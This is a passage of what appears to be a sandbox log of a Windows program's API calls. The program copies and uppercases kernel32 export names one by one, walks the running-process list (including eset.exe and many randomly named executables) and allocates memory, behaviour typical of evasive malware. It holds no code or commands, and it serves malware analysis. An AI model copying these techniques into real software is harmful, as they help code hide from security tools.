(lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0030.727] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0030.727] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0030.727] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0030.727] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0030.727] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0030.727] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0030.727] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0030.727] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0030.727] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0030.727] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0030.727] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0030.727] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0030.727] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0030.727] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0030.727] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0030.728] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0030.728] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0030.728] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0030.728] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0030.728] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0030.728] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0030.728] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0030.728] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0030.728] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0030.732] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0030.733] GetLastError () returned 0x0 [0030.733] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.734] GetLastError () returned 0x0 [0030.734] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0030.735] GetLastError () returned 0x0 [0030.735] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.736] GetLastError () returned 0x0 [0030.736] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0030.737] GetLastError () returned 0x0 [0030.737] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0030.738] GetLastError () returned 0x0 [0030.738] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0030.738] GetLastError () returned 0x0 [0030.739] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0030.739] GetLastError () returned 0x0 [0030.740] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.740] GetLastError () returned 0x0 [0030.741] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.741] GetLastError () returned 0x0 [0030.742] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.742] GetLastError () returned 0x0 [0030.743] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.743] GetLastError () returned 0x0 [0030.744] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.745] GetLastError () returned 0x0 [0030.745] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0030.746] GetLastError () returned 0x0 [0030.746] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.747] GetLastError () returned 0x0 [0030.747] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.748] GetLastError () returned 0x0 [0030.748] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0030.749] GetLastError () returned 0x0 [0030.749] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0030.750] GetLastError () returned 0x0 [0030.750] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0030.750] GetLastError () returned 0x0 [0030.751] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.751] GetLastError () returned 0x0 [0030.752] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.752] GetLastError () returned 0x0 [0030.753] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.753] GetLastError () returned 0x0 [0030.754] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.754] GetLastError () returned 0x0 [0030.755] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartbunny.exe")) returned 1 [0030.755] GetLastError () returned 0x0 [0030.756] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="distantstillcomparable.exe")) returned 1 [0030.756] GetLastError () returned 0x0 [0030.757] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="l-schemes.exe")) returned 1 [0030.757] GetLastError () returned 0x0 [0030.757] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="direction_danny.exe")) returned 1 [0030.758] GetLastError () returned 0x0 [0030.758] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressions.exe")) returned 1 [0030.759] GetLastError () returned 0x0 [0030.760] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical bread collections.exe")) returned 1 [0030.760] GetLastError () returned 0x0 [0030.761] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="walker profile.exe")) returned 1 [0030.761] GetLastError () returned 0x0 [0030.762] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spanish_phoenix.exe")) returned 1 [0030.762] GetLastError () returned 0x0 [0030.763] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecommunications.exe")) returned 1 [0030.763] GetLastError () returned 0x0 [0030.764] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pointer lions.exe")) returned 1 [0030.764] GetLastError () returned 0x0 [0030.764] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lose coordinates.exe")) returned 1 [0030.765] GetLastError () returned 0x0 [0030.765] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="junior_branch_pension.exe")) returned 1 [0030.766] GetLastError () returned 0x0 [0030.766] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travels-exercise-readings.exe")) returned 1 [0030.767] GetLastError () returned 0x0 [0030.767] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="officials les.exe")) returned 1 [0030.768] GetLastError () returned 0x0 [0030.768] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pspbouquetcontrary.exe")) returned 1 [0030.769] GetLastError () returned 0x0 [0030.769] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="founder_heavily_session.exe")) returned 1 [0030.769] GetLastError () returned 0x0 [0030.770] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="investigation.exe")) returned 1 [0030.770] GetLastError () returned 0x0 [0030.771] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="still.exe")) returned 1 [0030.771] GetLastError () returned 0x0 [0030.772] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="patrick.exe")) returned 1 [0030.772] GetLastError () returned 0x0 [0030.773] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oman-lovely-often.exe")) returned 1 [0030.773] GetLastError () returned 0x0 [0030.774] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="losdirectories.exe")) returned 1 [0030.774] GetLastError () returned 0x0 [0030.775] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="phentermine.exe")) returned 1 [0030.775] GetLastError () returned 0x0 [0030.776] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="notices.exe")) returned 1 [0030.776] GetLastError () returned 0x0 [0030.777] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0030.777] GetLastError () returned 0x0 [0030.778] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.778] GetLastError () returned 0x0 [0030.779] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.779] GetLastError () returned 0x0 [0030.779] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eset.exe")) returned 1 [0030.780] GetLastError () returned 0x0 [0030.780] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eset.exe")) returned 0 [0030.784] VirtualAlloc (lpAddress=0x0, dwSize=0x1262, flAllocationType=0x3000, flProtect=0x4) returned 0x100000 [0030.784] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x110000 [0030.785] VirtualAlloc (lpAddress=0x0, dwSize=0x1f4, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0030.785] lstrlenA (lpString="kernel32.dll") returned 12 [0030.785] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.785] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.785] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.785] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.785] lstrlenA (lpString="ADDATOMA") returned 8 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.785] lstrlenA (lpString="ADDATOMW") returned 8 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.785] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.785] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.785] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.785] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.785] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.786] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.786] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.786] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.786] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.786] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, 